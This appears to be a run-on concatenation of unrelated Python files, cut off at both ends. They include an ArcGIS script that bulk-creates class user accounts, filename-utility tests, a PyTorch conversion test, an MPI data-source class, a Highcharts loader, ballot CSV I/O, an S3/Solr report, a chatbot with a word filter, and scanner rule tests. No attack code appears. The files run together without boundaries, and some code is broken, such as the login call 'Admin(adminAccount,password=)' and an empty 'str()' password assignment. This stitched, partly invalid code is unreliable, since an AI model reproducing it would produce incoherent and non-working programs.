update_client_state(self, resp): self.state.update_client(resp) # Requires admin role. import csv, time,sys,arcpy from agoTools.admin import Admin adminAccount = arcpy.GetParameterAsText(0) adminPassword =arcpy.GetParameterAsText(1) className = arcpy.GetParameterAsText(2) classSnippet = arcpy.GetParameterAsText(3) csvFile = arcpy.GetParameterAsText(4) userPrefix = arcpy.GetParameterAsText(5) userPassword = arcpy.GetParameterAsText(6) userRole = arcpy.GetParameterAsText(7) instructorAccount = arcpy.GetParameterAsText(8) provider = "arcgis" if not adminAccount: adminAccount = "your ago account" if not adminPassword: adminPassword = "" if not className: className = "Sample Class" if not classSnippet: classSnippet = "Snippet goes here" if not csvFile: csvFile = r"C:\students.csv" if not userPrefix: userPrefix = "labUser_" if not userPassword: userPassword = "" if not userRole: userRole = "account_user" if not provider: provider = "arcgis" ##Unicode is not encoding properly so convert all arcpy params adminAccount = str(adminAccount) adminPassword = str() className = str(className) classSnippet = str(classSnippet) userPrefix = str(userPrefix) userPassword = str() userRole = str(userRole) provider = str(provider) arcpy.AddMessage("Logging in...") try: agoAdmin = Admin(adminAccount,password=) except: arcpy.AddError("Login failed. Please re-enter your admin username and password.") sys.exit() ##Get roles from the portal so we can translate the user-entered name to the role id that the api needs. ##Also confirm that the user-entered role is valid. allRoles = agoAdmin.getRoles() ##getRoles doesn't return predefined system roles, so we'll add those roles = {'Administrator':'org_admin', 'Publisher':'org_publisher', 'Author':'org_author', 'User':'org_viewer'} for role in allRoles: roles[role["name"]] = role["id"] if not userRole in roles.keys(): arcpy.AddError(userRole + " is not a valid role.") sys.exit() roleId =roles[userRole] arcpy.AddMessage("Creating Group...") print "Creating Group..." group = agoAdmin.createGroup(className,classSnippet) description = "Lab account for " + className if "group" in group: groupId = group["group"]["id"] arcpy.AddMessage("Creating Users...") print "Creating Users..." i = 1 users = [] sameNameCounter = 1 with open(csvFile,"rb") as userFile: rows = csv.reader(userFile) for row in rows: userFirstName = row[0] userLastName = row[1] userEmail = row[2] username = userPrefix + "_" + userLastName if username in users: username += "_" + str(sameNameCounter) sameNameCounter +=1 arcpy.AddMessage("creating " + username + "...") print "creating " + username + "..." agoAdmin.createUser(username,userPassword,userFirstName,userLastName,userEmail,description,roleId,provider) users.append(username) arcpy.AddMessage("Adding New Users to Group...") print "Adding Users to Group..." agoAdmin.addUsersToGroups(users,[groupId]) if instructorAccount: arcpy.AddMessage("Reassigning group ownership to " + instructorAccount + "...") print "Reassigning group ownership to " + instructorAccount + "..." agoAdmin.reassignGroupOwnership(groupId,instructorAccount) print "Done" else: arcpy.AddError("Failed to create group") arcpy.AddError(group["error"]["details"]) print "Failed to create group: " + group["error"]["details"] # !/usr/bin/python # coding=utf-8 from __future__ import (absolute_import, division, print_function, unicode_literals) from unittest import TestCase from misc_filename_utils.funcs import get_safe_path_name, get_filename_from_url class SafePathTestCase(TestCase): def test_safe_path_name(self): test_data = [ ("ABC.pdf", "abc.pdf"), ("čřž", "crz"), ("&&", ""), ("A-B-C.DOCx", "a-b-c.docx"), ] for unsafe_filename, expected in test_data: self.assertEqual(get_safe_path_name(unsafe_filename), expected) class FilenameFromUrlTestCase(TestCase): def test_filename_from_url(self): test_data = [ ("http://www.example.com/foo.pdf", "foo.pdf"), ("http://example.com/foo/bar/foo-bar.jpg?h600", "foo-bar.jpg"), ("fooBar.JPG", "fooBar.jpg"), ("\n\n\n\t\t\tfooBar.JPG \n\t ", "fooBar.jpg"), ] for url, expected_filename in test_data: self.assertEqual(get_filename_from_url(url), expected_filename) books/debugging/better_exceptions/test_better_exceptions_django/test_better_exceptions_django/fm.py import logging from better_exceptions import format_exception class ExceptionFormatter(logging.Formatter): def formatException(self, ei): return format_exception(*ei) juanCastrillo/gluon2pytorch import torch import mxnet as mx import numpy as np from gluon2pytorch import gluon2pytorch class PadTest(mx.gluon.nn.HybridSequential): def __init__(self, pad_type, pad=0): super(PadTest, self).__init__() from mxnet.gluon import nn with self.name_scope(): self.conv1 = nn.Conv2D(3, 32) self.relu = nn.Activation('relu') self.pad_type = pad_type self.pad = pad def hybrid_forward(self, F, x): x = F.pad(self.relu(self.conv1(x)), self.pad_type, (0, 0, 0, 0, self.pad, self.pad, self.pad, self.pad), constant_value=0) return x def check_error(gluon_output, pytorch_output, epsilon=1e-5): pytorch_output = pytorch_output.data.numpy() gluon_output = gluon_output.asnumpy() error = np.max(pytorch_output - gluon_output) print('Error:', error) assert error < epsilon return error if __name__ == '__main__': print('Test pad:') for pad_type in ['reflect', 'edge', 'constant']: for pad in [0, 1, 2, 10, 20]: net = PadTest(pad_type=pad_type, pad=pad) # Make sure it's hybrid and initialized net.hybridize() net.collect_params().initialize() pytorch_model = gluon2pytorch(net, [(1, 3, 224, 224)], dst_dir=None, pytorch_module_name='PadTest') pytorch_model.eval() input_np = np.random.uniform(-1, 1, (1, 3, 224, 224)) gluon_output = net(mx.nd.array(input_np)) pytorch_output = pytorch_model(torch.FloatTensor(input_np)) check_error(gluon_output, pytorch_output) import sys import os import numpy as np from psana.psexp import * from psana import dgram from psana.event import Event from psana.dgrammanager import DgramManager from psana.smalldata import SmallData import time import logging logger = logging.getLogger(__name__) from psana.psexp.tools import mode if mode == 'mpi': from mpi4py import MPI class InvalidEventBuilderCores(Exception): pass nodetype = None class RunParallel(Run): """ Yields list of events from multiple smd/bigdata files using > 3 cores.""" def __init__(self, ds, run_evt): super(RunParallel, self).__init__(ds) self.ds = ds self.comms = ds.comms self._evt = run_evt self.beginruns = run_evt._dgrams self.configs = ds._configs self._get_runinfo() super()._setup_envstore() def events(self): evt_iter = self.start() for evt in evt_iter: if evt.service() != TransitionId.L1Accept: continue st = time.time() yield evt en = time.time() self.c_ana.labels('seconds','None').inc(en-st) self.c_ana.labels('batches','None').inc() def steps(self): evt_iter = self.start() for evt in evt_iter: if evt.service() == TransitionId.BeginStep: yield Step(evt, evt_iter) def start(self): """ Request data for this run""" if nodetype == 'smd0': self.ds.smd0.start() elif nodetype == 'eb': self.ds.eb_node.start() elif nodetype == 'bd': for evt in self.ds.bd_node.start(): yield evt elif nodetype == 'srv': return def safe_mpi_abort(msg): print(msg) sys.stdout.flush() # make sure error is printed MPI.COMM_WORLD.Abort() class MPIDataSource(DataSourceBase): def __init__(self, comms, *args, **kwargs): super(MPIDataSource, self).__init__(**kwargs) self.comms = comms comm = self.comms.psana_comm # todo could be better rank = comm.Get_rank() size = comm.Get_size() global nodetype nodetype = self.comms.node_type() self.smd_fds = None # prepare comms for running SmallData PS_SRV_NODES = int(os.environ.get('PS_SRV_NODES', 0)) if PS_SRV_NODES > 0: self.smalldata_obj = SmallData(**self.smalldata_kwargs) else: self.smalldata_obj = None # check if no. of ranks is enough nsmds = int(os.environ.get('PS_EB_NODES', 1)) # No. of smd cores if not (size > (nsmds + 1)): msg = f"""ERROR Too few MPI processes. MPI size must be more than no. of all workers. \n\tTotal psana size:{size} \n\tPS_EB_NODES: {nsmds}""" safe_mpi_abort(msg) # can only have 1 EventBuilder when running with destination if self.destination and nsmds > 1: msg = 'ERROR Too many EventBuilder cores with destination callback' safe_mpi_abort(msg) # setup runnum list if nodetype == 'smd0': super()._setup_runnum_list() else: self.runnum_list= None self.xtc_path = None self.runnum_list = comm.bcast(self.runnum_list, root=0) self.xtc_path = comm.bcast(self.xtc_path, root=0) self.runnum_list_index = 0 self._start_prometheus_client(mpi_rank=rank) self._setup_run() def __del__(self): if nodetype == 'smd0': super()._close_opened_smd_files() self._end_prometheus_client(mpi_rank=self.comms.psana_comm.Get_rank()) def _setup_configs(self): """ Creates and broadcasts configs only called by _setup_run() """ g_ts = self.prom_man.get_metric("psana_timestamp") if nodetype == 'smd0': super()._close_opened_smd_files() self.smd_fds = np.array([os.open(smd_file, os.O_RDONLY) for smd_file in self.smd_files], dtype=np.int32) logger.debug(f'mpi_ds: smd0 opened smd_fds: {self.smd_fds}') self.smdr_man = SmdReaderManager(self.smd_fds, self.dsparms) self._configs = self.smdr_man.get_next_dgrams() super()._setup_det_class_table() super()._set_configinfo() g_ts.labels("first_event").set(time.time()) nbytes = np.array([memoryview(config).shape[0] for config in self._configs], \ dtype='i') else: self._configs = None nbytes = np.empty(len(self.smd_files), dtype='i') self.comms.psana_comm.Bcast(nbytes, root=0) # no. of bytes is required for mpich if nodetype != 'smd0': self._configs = [np.empty(nbyte, dtype='b') for nbyte in nbytes] for i in range(len(self._configs)): self.comms.psana_comm.Bcast([self._configs[i], nbytes[i], MPI.BYTE], root=0) if nodetype != 'smd0': self._configs = [dgram.Dgram(view=config, offset=0) for config in self._configs] g_ts.labels("first_event").set(time.time()) self._setup_det_class_table() self._set_configinfo() def _setup_run(self): if self.runnum_list_index == len(self.runnum_list): return False runnum = self.runnum_list[self.runnum_list_index] self.runnum_list_index += 1 if nodetype == 'smd0': super()._setup_run_files(runnum) super()._apply_detector_selection() else: self.xtc_files = None self.smd_files = None self.dsparms.use_smds = None self.xtc_files = self.comms.psana_comm.bcast(self.xtc_files, root=0) self.smd_files = self.comms.psana_comm.bcast(self.smd_files, root=0) self.dsparms.use_smds = self.comms.psana_comm.bcast(self.dsparms.use_smds, root=0) self._setup_configs() self.dm = DgramManager(self.xtc_files, configs=self._configs, found_xtc2_callback=super().found_xtc2_callback) if nodetype == 'smd0': self.smd0 = Smd0(self.comms, self._configs, self.smdr_man, self.dsparms) elif nodetype == 'eb': self.eb_node = EventBuilderNode(self.comms, self._configs, self.dsparms, self.dm) elif nodetype == 'bd': self.bd_node = BigDataNode(self.comms, self._configs, self.dsparms, self.dm) return True def _setup_beginruns(self): """ Determines if there is a next run as 1) New run found in the same smalldata files 2) New run found in the new smalldata files """ while True: if nodetype == 'smd0': dgrams = self.smdr_man.get_next_dgrams() nbytes = np.zeros(len(self.smd_files), dtype='i') if dgrams is not None: nbytes = np.array([memoryview(d).shape[0] for d in dgrams], dtype='i') else: dgrams = None nbytes = np.empty(len(self.smd_files), dtype='i') self.comms.psana_comm.Bcast(nbytes, root=0) if np.sum(nbytes) == 0: return False if nodetype != 'smd0': dgrams = [np.empty(nbyte, dtype='b') for nbyte in nbytes] for i in range(len(dgrams)): self.comms.psana_comm.Bcast([dgrams[i], nbytes[i], MPI.BYTE], root=0) if nodetype != 'smd0': dgrams = [dgram.Dgram(view=d, config=config, offset=0) \ for d, config in zip(dgrams,self._configs)] if dgrams[0].service() == TransitionId.BeginRun: self.beginruns = dgrams return True # end while True def _setup_run_calibconst(self): if nodetype == 'smd0': super()._setup_run_calibconst() else: self.dsparms.calibconst = None self.dsparms.calibconst = self.comms.psana_comm.bcast(self.dsparms.calibconst, root=0) def _start_run(self): if self._setup_beginruns(): # try to get next run from current files self._setup_run_calibconst() return True elif self._setup_run(): # try to get next run from next files if self._setup_beginruns(): self._setup_run_calibconst() return True def runs(self): while self._start_run(): run = RunParallel(self, Event(dgrams=self.beginruns)) yield run 0 from cgr_gwas_qc.workflow.scripts import trim_ped_map_ids def test_trim_ped_ids(fake_data_cache): filename = fake_data_cache / "plink/samples.ped" trimmed = trim_ped_map_ids.trim_ped_ids(filename, 2) row = next(trimmed) columns = row.split(" ") assert 2 == len(columns[0]) assert 2 == len(columns[1]) def test_trim_map_ids(fake_data_cache): filename = fake_data_cache / "plink/samples.map" trimmed = trim_ped_map_ids.trim_map_ids(filename, 2) row = next(trimmed) columns = row.split("\t") assert 2 == len(columns[1]) class Solution: def customSortString(self, S: str, T: str) -> str: ans = "" count = [0] * 26 for c in T: count[ord(c) - ord('a')] += 1 for c in S: while count[ord(c) - ord('a')] > 0: ans += c count[ord(c) - ord('a')] -= 1 for c in string.ascii_lowercase: for _ in range(count[ord(c) - ord('a')]): ans += c return ans bin/highcharts_loader.py import json from base64 import b64encode import requests class EmptyParams(Exception): pass class ToManyParams(Exception): pass class Options: data = {} def __init__(self, *, from_file=None, from_dict=None): if not from_file and not from_dict: raise EmptyParams('You should pass "from_file" or "from_dict" param.') if from_file and from_dict: raise ToManyParams('You should pass only one param: "from_file" or "from_dict".') self.data = json.loads(open(from_file).read()) if from_file else from_dict class ChartLoader: raw_chart_data = None url = 'http://export.highcharts.com/' image_type = None def __init__(self, options: Options, image_type='image/png'): self.image_type = image_type response = requests.post(self.url, data={ 'type': image_type, 'options': json.dumps(options.data) }) if response.status_code == requests.codes.ok: self.raw_chart_data = response.content else: response.raise_for_status() def _decoded_chart(self): return b64encode(self.raw_chart_data).decode() def get_data_image(self): return 'data:image/{0};charset=utf-8;base64,{1}'.format(self.image_type, self._decoded_chart()) def get_raw_data(self): return self.raw_chart_data def save_to_file(self, path): f = open(path, 'wb+') f.write(self.raw_chart_data) f.close() 1-10 import gzip from csv import DictReader, DictWriter from itertools import groupby from typing import Iterator, TextIO from ranked_vote.ballot import Ballot, parse_choice def read_ballots_fh(fh: TextIO) -> Iterator[Ballot]: reader = DictReader(fh) for ballot_id, rows in groupby(reader, lambda x: x['ballot_id']): choices = [parse_choice(row['choice']) for row in rows] yield Ballot(ballot_id, choices) def write_ballots_fh(fh: TextIO, ballots: Iterator[Ballot]): writer = DictWriter(fh, ['ballot_id', 'rank', 'choice'], lineterminator='\n') writer.writeheader() for ballot in ballots: for rank, choice in enumerate(ballot.choices, 1): writer.writerow({ 'ballot_id': ballot.ballot_id, 'rank': rank, 'choice': str(choice) }) def read_ballots(filename: str) -> Iterator[Ballot]: if filename.endswith('.gz'): fh = gzip.open(filename, 'rt') else: fh = open(filename, 'r') yield from read_ballots_fh(fh) fh.close() def write_ballots(filename: str, ballots: Iterator[Ballot]): if filename.endswith('.gz'): fh = gzip.open(filename, 'wt', encoding='UTF-8') else: fh = open(filename, 'w') write_ballots_fh(fh, ballots) fh.close() setup-for-swig.py10-100 from distutils.core import setup, Extension setup( ext_modules = [ Extension("_hello", sources=["hello.c", "hello.i"]) ] ) import sys import os try: import configparser except: import ConfigParser as configparser import logging # import json import datetime import argparse import csv import boto3 from get_solr_json import get_solr_json logger = logging.getLogger(__name__) logger.setLevel(logging.DEBUG) def get_solr_docs(solr_url, api_key, query=None): '''Get just the documents for a given query''' cursorMark = '*' if not query: query = { 'q': 'structmap_url:[* TO *]', 'fl': 'id, structmap_url, collection_url, type_ss', 'rows': 1000, 'cursorMark': cursorMark, 'sort': 'id asc' } docs = [] num_read = 0 solr_json = get_solr_json(solr_url, query, api_key=api_key) while len(solr_json['response']['docs']) > 0: cursorMark = solr_json['nextCursorMark'] query['cursorMark'] = cursorMark docs.extend(solr_json['response']['docs']) num_read += len(solr_json['response']['docs']) if (num_read % 5000) == 0: logger.info(num_read) solr_json = get_solr_json(solr_url, query, api_key=api_key) return docs def get_summary_objects(s3, bucket, prefix): bucket = s3.Bucket(bucket) return bucket.objects.filter(Prefix=prefix) def get_media_json_keys(s3): # gather list of media json files "keys" # keys will be 'media_json/-media.json' media_json_object_summaries = get_summary_objects( s3, 'static.ucldc.cdlib.org', 'media_json') media_json_keys = [] count = 0 for objsum in media_json_object_summaries: count += 1 if (count % 5000) == 0: logger.info(count) media_json_keys.append(objsum.key) return media_json_keys # this was REALLY slow # obj_summary = s3.ObjectSummary(bucket, '{}/{}'.format(folder, key)) # try: # obj_summary.size # except botocore.exceptions.ClientError as e: # logger.info('missing media: {}'.format(row)) # missing_media.append(row) def missing_media_json(s3, solr_docs): missing_media = [] count = 0 media_json_keys = get_media_json_keys(s3) for row in solr_docs: count += 1 bucket, folder, key = row['structmap_url'].rsplit('/', 2) s3key = '{}/{}'.format(folder, key) if s3key not in media_json_keys: if (len(missing_media) % 1000) == 0: logger.info('{} bad so far'.format(len(missing_media))) missing_media.append(row) return missing_media def get_jp2000_file_sizes(s3): '''Get the sizes and UUID for all of the jp2000 files on s3 Return a dictionary indexed by UUID''' jp2000_object_summaries = get_summary_objects(s3, 'ucldc-private-files', 'jp2000') uuid_sizes = {} for objsum in jp2000_object_summaries: folder, UUID = objsum.key.rsplit('/', 1) uuid_sizes[UUID] = objsum.size return uuid_sizes def get_missing_jp2000_docs(s3, solr_docs): ''' Build a list of all the docs with missing or 0 size jp2000 ''' uuid_sizes = get_jp2000_file_sizes(s3) problems = [] for doc in solr_docs: if doc.get('type_ss') != ['image']: continue UUID = doc['id'] if not uuid_sizes.get(UUID): if uuid_sizes.get(UUID) is None: doc['size'] = -1 else: doc['size'] = uuid_sizes[UUID] if (len(problems) % 1000) == 0: logger.info('{} jp2000s bad so far'.format(len(problems))) problems.append(doc) return problems def main(argv=None): parser = argparse.ArgumentParser() parser.add_argument( '--outdir', default='reports', help='out directory for reports (defaults to reports)') parser.add_argument( '--inisection', default='new-index', help='section of report.ini to get Solr server info') if argv is None: argv = parser.parse_args() config = configparser.SafeConfigParser() config.read('report.ini') solr_url = config.get(argv.inisection, 'solrUrl') api_key = config.get(argv.inisection, 'solrAuth') print('SOLR: {}'.format(solr_url)) nuxeo_solr_docs = get_solr_docs(solr_url, api_key) #with open('nuxeo_solr_docs.json', 'w') as foo: # json.dump(nuxeo_solr_docs, foo, indent=2) print('\n\n{} nuxeo objects in Solr\n\n'.format(len(nuxeo_solr_docs))) print('\n\nGet object list from S3\n\n') s3 = boto3.resource('s3') media_json_keys = get_media_json_keys(s3) print('\n\nTotal number of media_json in s3:' '{}\n\n'.format(len(media_json_keys))) missing_media = missing_media_json(s3, nuxeo_solr_docs) missing_media_sorted = sorted( missing_media, key=lambda x: x['collection_url']) print('{} missing media_json files'.format(len(missing_media_sorted))) #with open('missing_media.json', 'w') as foo: # json.dump(missing_media_sorted, foo, indent=2) today = datetime.date.today() fileout = os.path.join(argv.outdir, '{}-{}-{}.csv'.format( today, 'missing-media-json', argv.inisection)) with open(fileout, 'w') as csvfile: writer = csv.writer(csvfile) for obj in missing_media_sorted: writer.writerow((obj['collection_url'], obj['id'], obj['structmap_url'], obj.get('type_ss'))) missing_jp2000 = get_missing_jp2000_docs(s3, nuxeo_solr_docs) missing_jp2000_sorted = sorted( missing_jp2000, key=lambda x: x['collection_url']) print('{} missing jp2000 files'.format(len(missing_jp2000_sorted))) #with open('missing_jp2000.json', 'w') as foo: # json.dump(missing_jp2000_sorted, foo, indent=2) fileout = os.path.join(argv.outdir, '{}-{}-{}.csv'.format( today, 'missing-jp2000', argv.inisection)) with open(fileout, 'w') as csvfile: writer = csv.writer(csvfile) for obj in missing_jp2000_sorted: writer.writerow( (obj['collection_url'], obj['id'], obj['structmap_url'], obj.get('type_ss'), obj['size'])) if __name__ == "__main__": sh = logging.StreamHandler() sh.setLevel(logging.DEBUG) logger.addHandler(sh) sys.exit(main()) """ @author: liucong @contact: @time: 2020/8/4 11:25 """ import torch import torch.nn.functional as F from tokenization_unilm import UnilmTokenizer from modeling_unilm import UnilmForSeq2SeqDecodeSample, UnilmConfig import copy import os import argparse import re from dirty_recognize import dirty_reg def remove_dirty_sentence(dirty_obj, sentence): if len(dirty_obj.match(sentence)) == 0: return False else: return True def remove_multi_symbol(text): r = re.compile(r'([.,,/\\#!!??。$%^&*;;::{}=_`´︵~()()-])[.,,/\\#!!??。$%^&*;;::{}=_`´︵~()()-]+') text = r.sub(r'\1', text) return text def top_k_top_p_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')): assert logits.dim() == 1 top_k = min(top_k, logits.size(-1)) if top_k > 0: indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None] logits[indices_to_remove] = filter_value if top_p > 0.0: sorted_logits, sorted_indices = torch.sort(logits, descending=True) cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1) sorted_indices_to_remove = cumulative_probs > top_p sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone() sorted_indices_to_remove[..., 0] = 0 indices_to_remove = sorted_indices[sorted_indices_to_remove] logits[indices_to_remove] = filter_value return logits def main(): parser = argparse.ArgumentParser() parser.add_argument('--device', default='0', type=str, help='生成设备') parser.add_argument('--topk', default=3, type=int, help='取前k个词') parser.add_argument('--topp', default=0.95, type=float, help='取超过p的词') parser.add_argument('--dirty_path', default='data/dirty_words.txt', type=str, help='敏感词库') parser.add_argument('--model_name_or_path', default='kuakua_robot_model/', type=str, help='模型路径') parser.add_argument('--repetition_penalty', default=1.2, type=float, help="重复词的惩罚项") parser.add_argument('--max_len', type=int, default=32, help='生成的对话的最大长度') parser.add_argument('--no_cuda', type=bool, default=False, help='是否使用GPU进行预测') args = parser.parse_args() args.cuda = torch.cuda.is_available() and not args.no_cuda device = 'cuda' if args.cuda else 'cpu' print('using device:{}'.format(device)) os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID' os.environ["CUDA_VISIBLE_DEVICES"] = args.device config = UnilmConfig.from_pretrained(args.model_name_or_path, max_position_embeddings=512) tokenizer = UnilmTokenizer.from_pretrained(args.model_name_or_path, do_lower_case=False) model = UnilmForSeq2SeqDecodeSample.from_pretrained(args.model_name_or_path, config=config) model.to(device) model.eval() print('Chitchat Robot Starting') dirty_obj = dirty_reg(args.dirty_path) while True: try: text = input("user:") if remove_dirty_sentence(dirty_obj, text): print("chatbot:" + "换个话题聊聊吧。") continue input_ids = tokenizer.encode(text) token_type_ids = [4] * len(input_ids) generated = [] for _ in range(args.max_len): curr_input_ids = copy.deepcopy(input_ids) curr_input_ids.append(tokenizer.mask_token_id) curr_input_tensor = torch.tensor(curr_input_ids).long().to(device).view([1, -1]) curr_token_type_ids = copy.deepcopy(token_type_ids) curr_token_type_ids.extend([5]) curr_token_type_ids = torch.tensor(curr_token_type_ids).long().to(device).view([1, -1]) outputs = model(input_ids=curr_input_tensor, token_type_ids=curr_token_type_ids, attention_mask=None) next_token_logits = outputs[-1, -1, :] for id in set(generated): next_token_logits[id] /= args.repetition_penalty next_token_logits[tokenizer.convert_tokens_to_ids('[UNK]')] = -float('Inf') filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=args.topk, top_p=args.topp) next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1) if next_token == tokenizer.sep_token_id: # 遇到[SEP]则表明生成结束 break generated.append(next_token.item()) input_ids.append(next_token.item()) token_type_ids.extend([5]) text = tokenizer.convert_ids_to_tokens(generated) text = remove_multi_symbol("".join(text)) if remove_dirty_sentence(dirty_obj, text): print("chatbot:" + "我要想一想。") else: print("chatbot:" + text) except: print("chatbot:" + "说点别的吧,好吗?") if __name__ == "__main__": main() # Copyright (C) 2016-Present Pivotal Software, Inc. All rights reserved. # # This program and the accompanying materials are made available under # the terms of the under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import unittest import os from ephemerol import Scanner class TestYAMLRules(unittest.TestCase): def setUp(self): Scanner.scan_results = [] def test_simple_rule_load(self): rule = """ - category: "Web Profile" app_type: java file_type: config refactor_rating: 0 description: "Web application config file" files: ["web.xml"] """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(1, len(Scanner.rulebase), "Should have loaded 1 rule") rule = Scanner.rulebase[0] self.assertEqual("Web Profile", rule.file_category, "Category should be mapped") self.assertEqual("java", rule.app_type, "App Type should be mapped") self.assertEqual("config", rule.file_type, "File Type should be mapped") self.assertEqual("0", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("Web application config file", rule.description, "Description should be mapped") self.assertEqual("web.xml", rule.file_name, "File Name should be mapped") def test_multiple_file_rule_load(self): rule = """ - category: "Web Profile" app_type: java file_type: config refactor_rating: 0 description: "Web application config file" files: - "web.xml" - "foo.barml" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) rule = Scanner.rulebase[0] self.assertEqual("Web Profile", rule.file_category, "Category should be mapped") self.assertEqual("java", rule.app_type, "App Type should be mapped") self.assertEqual("config", rule.file_type, "File Type should be mapped") self.assertEqual("0", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("Web application config file", rule.description, "Description should be mapped") self.assertEqual("web.xml", rule.file_name, "File Name should be mapped") rule = Scanner.rulebase[1] self.assertEqual("Web Profile", rule.file_category, "Category should be mapped") self.assertEqual("java", rule.app_type, "App Type should be mapped") self.assertEqual("config", rule.file_type, "File Type should be mapped") self.assertEqual("0", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("Web application config file", rule.description, "Description should be mapped") self.assertEqual("foo.barml", rule.file_name, "File Name should be mapped") def test_rule_load_with_replatform_advice(self): rule = """ - category: "JEE Config" app_type: java file_type: config refactor_rating: 1 replatform_advice: "Convert to Spring based application configuration" description: "JEE specific config file" files: - "application.xml" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(1, len(Scanner.rulebase)) rule = Scanner.rulebase[0] self.assertEqual("JEE Config", rule.file_category, "Category should be mapped") self.assertEqual("java", rule.app_type, "App Type should be mapped") self.assertEqual("config", rule.file_type, "File Type should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("Convert to Spring based application configuration", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("JEE specific config file", rule.description, "Description should be mapped") self.assertEqual("application.xml", rule.file_name, "File Name should be mapped") def test_rule_load_with_overriden_description_replatform_advice_refactor_rating(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 0 replatform_advice: "foo" description: "desc1" files: - "file1": { description: "desc2", replatform_advice: "bar", refactor_rating: 2 } - "file2" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) found1 = False found2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertTrue(rule.file_name == "file1" or rule.file_name == "file2") if rule.file_name == "file1": found1 = True self.assertEqual("2", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("bar", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("desc2", rule.description, "Description should be mapped") elif rule.file_name == "file2": found2 = True self.assertEqual("0", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("file2", rule.file_name, "File Name should be mapped") self.assertTrue(found1 and found2, "Should have found both file1 and file2") def test_rule_load_with_text_pattern(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: [ "pattern1" ] files: [ "file1" ] """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(1, len(Scanner.rulebase)) rule = Scanner.rulebase[0] self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("file1", rule.file_name, "File name should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("pattern1", rule.text_pattern, "Text pattern should be mapped") def test_rule_load_with_multiple_text_patterns(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: [ "pattern1", "pattern2" ] files: [ "file1" ] """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) found1 = False found2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("file1", rule.file_name, "File name should be mapped") self.assertTrue(rule.text_pattern == "pattern1" or rule.text_pattern == "pattern2") if rule.text_pattern == "pattern1": found1 = True elif rule.text_pattern == "pattern2": found2 = True self.assertTrue(found1 and found2, "Should have found pattern1 and pattern2") def test_rule_load_with_multiple_text_patterns_with_override(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: - "pattern1" - "pattern2": { description: "desc2", replatform_advice: "bar", refactor_rating: 2 } files: [ "file1" ] """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) found1 = False found2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("file1", rule.file_name, "File name should be mapped") self.assertTrue(rule.text_pattern == "pattern1" or rule.text_pattern == "pattern2") if rule.text_pattern == "pattern1": found1 = True self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor rating should be mapped") elif rule.text_pattern == "pattern2": found2 = True self.assertEqual("desc2", rule.description, "Description should be mapped") self.assertEqual("bar", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("2", rule.refactor_rating, "Refactor rating should be mapped") self.assertTrue(found1 and found2, "Should have found pattern1 and pattern2") def test_rule_load_with_file_pattern(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" file_pattern: "*.file1" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(1, len(Scanner.rulebase)) rule = Scanner.rulebase[0] self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("*.file1", rule.file_name, "File name should be 